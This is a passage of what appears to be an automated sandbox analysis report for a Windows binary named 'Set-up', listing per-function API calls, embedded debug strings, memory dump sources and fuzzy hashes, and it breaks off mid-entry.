                          • Instruction Fuzzy Hash: AF11BCF1E453402FFB2126225D4AB7B7588DB61374F140438FD49EA282FD66D914C5B2
                          APIs
                          • getsockname.WS2_32(?,?,00000080), ref: 0005A1C6
                          • WSAGetLastError.WS2_32 ref: 0005A1D0
                            • Part of subcall function 0003D090: GetLastError.KERNEL32 ref: 0003D0A1
                            • Part of subcall function 0003D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D0A9
                            • Part of subcall function 0003D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D0CD
                            • Part of subcall function 0003D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D0D7
                            • Part of subcall function 0003D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0003D381
                            • Part of subcall function 0003D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0003D3A2
                            • Part of subcall function 0003D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D3BF
                            • Part of subcall function 0003D090: GetLastError.KERNEL32 ref: 0003D3C9
                            • Part of subcall function 0003D090: SetLastError.KERNEL32(00000000), ref: 0003D3D4
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0005A21C
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0005A220
                          Strings
                          • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0005A23B
                          • getsockname() failed with errno %d: %s, xrefs: 0005A1F0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerrgetsockname
                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                          • API String ID: 2076026050-2605427207
                          • Opcode ID: f7189010a79da1269c78cacb45beb79bf068f19df10ab789bbd11e2458cf65db
                          • Instruction ID: 277f9982a4b995981f69c6898d6a76909f5272a77170af29448ad57e5e6b4a46
                          • Opcode Fuzzy Hash: f7189010a79da1269c78cacb45beb79bf068f19df10ab789bbd11e2458cf65db
                          • Instruction Fuzzy Hash: 9721E671908680AAE7269B18EC46FE777BCEF95324F040215FD9853152FB32598987A2
                          APIs
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00023BA6,?,006F0044,00021BD2), ref: 000273A6
                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00023BA6,?,006F0044,00021BD2), ref: 000273CA
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00023BA6,?,006F0044,00021BD2), ref: 000273D2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: __acrt_iob_func_errnofflush
                          • String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d calloc(%zu,%zu) = %p$calloc
                          • API String ID: 4185500129-1340350808
                          • Opcode ID: bf768c405c4136044da834b11c3d3717df47abe4814f10a2d506be220b53a822
                          • Instruction ID: 5d220c19276929dc6c73ee8f1de6e4d672556ee89c5db9be1e792057cc5d63bc
                          • Opcode Fuzzy Hash: bf768c405c4136044da834b11c3d3717df47abe4814f10a2d506be220b53a822
                          • Instruction Fuzzy Hash: 1421F075A04321ABE7209F15EC46F6BBBE9EB89B54F040428FC0C92252E661D900D7F2
                          APIs
                          • WSAStartup.WS2_32(00000202), ref: 0003D65A
                            • Part of subcall function 0003D690: GetModuleHandleA.KERNEL32(kernel32,00000000,?,?,?,0003D5FA,iphlpapi.dll), ref: 0003D699
                            • Part of subcall function 0003D690: GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 0003D6B5
                            • Part of subcall function 0003D690: strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,005A1BD4,?,?,0003D5FA,iphlpapi.dll), ref: 0003D6C3
                          • GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 0003D60C
                          • QueryPerformanceFrequency.KERNEL32(006F0070), ref: 0003D643
                          • WSACleanup.WS2_32 ref: 0003D67C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: AddressProc$CleanupFrequencyHandleModulePerformanceQueryStartupstrpbrk
                          • String ID: if_nametoindex$iphlpapi.dll
                          • API String ID: 3452087986-3097795196
                          • Opcode ID: faf95a99a113b547ce4f7ae26fe395832a1a99719ba92e6ad711559d9c3e4239
                          • Instruction ID: 12c9dbf8485b11837b17747786fd0e8f1cfec9781dce7841bf2972b8d1b05ec6
                          • Opcode Fuzzy Hash: faf95a99a113b547ce4f7ae26fe395832a1a99719ba92e6ad711559d9c3e4239
                          • Instruction Fuzzy Hash: B901F2A0A007404BF7526B78BC1B3763AEA7F52304F85146DE859C21A3FF78C598C362
                          APIs
                          • htonl.WS2_32(7F000001), ref: 000D4A21
                          • gethostname.WS2_32(00000000,00000040), ref: 000D4AA4
                          • WSAGetLastError.WS2_32 ref: 000D4AB3
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002E), ref: 000D4B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLastgethostnamehtonlstrchr
                          • String ID:
                          • API String ID: 655544046-0
                          • Opcode ID: 198bde75707e30a21545a4dac07fade048dcdec61cf7f99d1cdf95729fb6300e
                          • Instruction ID: 94964fda8ffb93b38788668299cdc906472c910ba717be31bad36921d635be2e
                          • Opcode Fuzzy Hash: 198bde75707e30a21545a4dac07fade048dcdec61cf7f99d1cdf95729fb6300e
                          • Instruction Fuzzy Hash: 9751E1706003008FE7709F66DD89727B6E4AF11325F08083FE98A8A7D1E774E840CB26
                          APIs
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,004FA76D), ref: 004FA698
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,004FA76D), ref: 004FA6B4
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,004FA76D), ref: 004FA71F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: calloc$free
                          • String ID:
                          • API String ID: 171065143-3916222277
                          • Opcode ID: 2b8270202f5489a23318de846107e0f8dd9758aba207a1d096c9af39cc251177
                          • Instruction ID: 673613564d38d94241723858d168d9b964c1502bcd88bc996c7375a71b366f0e
                          • Opcode Fuzzy Hash: 2b8270202f5489a23318de846107e0f8dd9758aba207a1d096c9af39cc251177
                          • Instruction Fuzzy Hash: B2118CF14007058FC720EF29C884A2BB7F0EF55724F154B2DD5A99B391D738E9158BA2
                          APIs
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000212EB
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00021323
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0002132E
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00021344
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: malloc$memcpystrlen
                          • String ID:
                          • API String ID: 3553820921-0
                          • Opcode ID: e34a3d21226647a9ea2f8cc2f3b2dfb48afd1b3465a13ba37f1031ed723dcc67
                          • Instruction ID: 350273448beb1733a7785e4a2adb13025f47c0a4b4d565ff83a8c6975b75822a
                          • Opcode Fuzzy Hash: e34a3d21226647a9ea2f8cc2f3b2dfb48afd1b3465a13ba37f1031ed723dcc67
                          • Instruction Fuzzy Hash: 8F3124B1904315CFDB21DF64E8807A9BBE2FF59304F05892ED948AB312DB35A905CF81
                          APIs
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000212EB
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00021323
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0002132E
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00021344
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: malloc$memcpystrlen
                          • String ID:
                          • API String ID: 3553820921-0
                          • Opcode ID: e36cd2c0110ffeb3b0325a3949c0993b1f6dfb92906d7030a157e189fb8cfe37
                          • Instruction ID: ca5c2e65f57a8aff066ce483763a4aff926ecb6c60dc8a2e9f5979fc2b0c3d6a
                          • Opcode Fuzzy Hash: e36cd2c0110ffeb3b0325a3949c0993b1f6dfb92906d7030a157e189fb8cfe37
                          • Instruction Fuzzy Hash: 7D21F2B5904715CFDB11DF64E8806ADB7F2FB89304F11892ED948AB312EB30A905CF81
                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(006F0044,0002208F), ref: 00023AB5
                          • ReleaseSRWLockExclusive.KERNEL32(006F0044,006F0044,0002208F), ref: 00023AD0
                          • ReleaseSRWLockExclusive.KERNEL32(006F0044), ref: 00023B02
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ExclusiveLock$Release$Acquire
                          • String ID:
                          • API String ID: 1021914862-0
                          • Opcode ID: 13bb99e3c14d6a37403b301ec9c0fe2e1862d6f939fc44f51cc81b44b9b3fe03
                          • Instruction ID: c7164b35d297732d74757fa0de9bea21d85fd90a9f25e8c32fbb39a19f123ba7
                          • Opcode Fuzzy Hash: 13bb99e3c14d6a37403b301ec9c0fe2e1862d6f939fc44f51cc81b44b9b3fe03
                          • Instruction Fuzzy Hash: 8BE08C6860011ABEF7A17B60AC03F3D2193BB21700BC41832B60C95063EE3D48088B6F
                          APIs
                          • closesocket.WS2_32(?), ref: 000278BB
                            • Part of subcall function 000272A0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,000003FF), ref: 000272F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: closesocketfwrite
                          • String ID: FD %s:%d sclose(%d)
                          • API String ID: 1967222983-3116021458
                          • Opcode ID: 8672a3c164b3f905d0208129940c55ee826585705ba6a7eb09c7cdaaea5fe046
                          • Instruction ID: 57a20e9ecbe59a63526c4a5bb232573482902dba0dcb5c4190652c84709978f7
                          • Opcode Fuzzy Hash: 8672a3c164b3f905d0208129940c55ee826585705ba6a7eb09c7cdaaea5fe046
                          • Instruction Fuzzy Hash: AAD05E32A092306B8B206A98BC48C9BBBA8EFC6F20B490558F94467201D6209C01C7F2
                          APIs
                          • connect.WS2_32(-00000028,-00000028,-00000028), ref: 000EB0B9
                          • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,000D3C41,00000000), ref: 000EB0C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLastconnect
                          • String ID:
                          • API String ID: 374722065-0
                          • Opcode ID: 0c93af6dedf852c4572b40bd4a6f3204aead80957513a23106bf430d725ce09b
                          • Instruction ID: 5521f918de3a0c59971f87767a2a984e0c3ee5e02816d3c4af5857025001fd99
                          • Opcode Fuzzy Hash: 0c93af6dedf852c4572b40bd4a6f3204aead80957513a23106bf430d725ce09b
                          • Instruction Fuzzy Hash: 8A01B1322042419FCB705A6A9884A6BB7E9FF88764F040725F978A31E1D726FE508752
                          APIs
                          • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,004FB0DF), ref: 004FB049
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,004FB0DF), ref: 004FB06C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _errnorealloc
                          • String ID:
                          • API String ID: 3650671883-0
                          • Opcode ID: f8cf14720859ee9b92dfc4fa6ecec5eae354b3b21a15f231d71f2fa83bbe881e
                          • Instruction ID: ccc52c0528fd483fc9d9433ad8f452078a1fc97cb030dfa56efc355ddaff5ca5
                          • Opcode Fuzzy Hash: f8cf14720859ee9b92dfc4fa6ecec5eae354b3b21a15f231d71f2fa83bbe881e
                          • Instruction Fuzzy Hash: 6BF062715006198FCB109B28C880567B6D5EB073247254757EA24DB6A6EB34C882CBD6
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,004F5DF1), ref: 004F6473
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
